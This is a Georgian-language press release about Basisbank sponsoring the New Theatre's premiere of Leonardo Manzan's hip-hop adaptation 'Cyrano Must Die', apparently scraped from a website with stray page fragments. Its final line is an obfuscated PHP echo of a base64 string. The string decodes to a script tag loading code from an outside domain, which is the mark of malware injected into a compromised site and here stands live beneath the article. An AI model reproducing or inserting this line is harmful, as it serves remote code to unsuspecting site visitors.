celsiusi
ავერსი საქკაბელი

ბაზისბანკი და ვასო აბაშიძის სახელობის ახალი თეატრი, 1 ნოემბერს, იტალიელი რეჟისორის ლეონარდო მანძანის სპექტაკლის სირანო უნდა მოკვდეს” პრემიერას შესთავაზებს თეატრის მოყვარულებს

ედმონ როსტანის სირანო დე ბერჟერაკისმიხედვით თავისუფალი ადაპტაციაა და მართლაც დიდი სიყვარულის, მეგობრობის, სიმამაცის ამბავია: მშვენიერი ლექსებითა და გულგასაგლეჯი ტრაგედიებით გაჯერებული, რომელიც რა ხანია აღელვებს და ცხარე ცრემლით ატირებს მაყურებელს. ასევე დიდი ღალატის და ტყუილისაც, რომელსაც ხშირად ჯიუტად არ ვიმჩნევთ.

სირანო უნდა მოკვდესკლასიკური პიესის გადაწერილი ვერსიაა, სპექტაკლიკონცერტი, რომელშიც მეცხრამეტე საუკუნის პოეტური სტრიქონების ნაცვლად, პერსონაჟები თანამედროვე ჰიპ-ჰოპის ენით მეტყველებენ და სადაც ამ უცნაურ და უჩვეულო ამბავს ამჯერად ქალის - როქსანის მონათხრობის მიხედვით გავეცნობით, - ერთადერთი მთავარი გმირის, რომელიც პიესაში არ მომკვდარა და ჯერაც ცოცხალია.

ბაზისბანკი, ახალი თეატრის საერთაშორისო პროექტების წარმდგენია.

ბაზისბანკი, როგორც ქართული კულტურის მხარდამჭერი, კოტე მარჯანიშვილის სახელობის თეატრის და სანდრო მრევლიშვილის თეატრის გენერალური სპონსორია, თოჯინების თეატრების გაერთიანების და ახალი თეატრალური სივრცის - „თოჯინების სახლისგენერალური სპონსორია, მხარს უჭერს ქვეყნის მასშტაბით განხორციელებულ არაერთ კულტურულ ღონისძიებას.

90
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");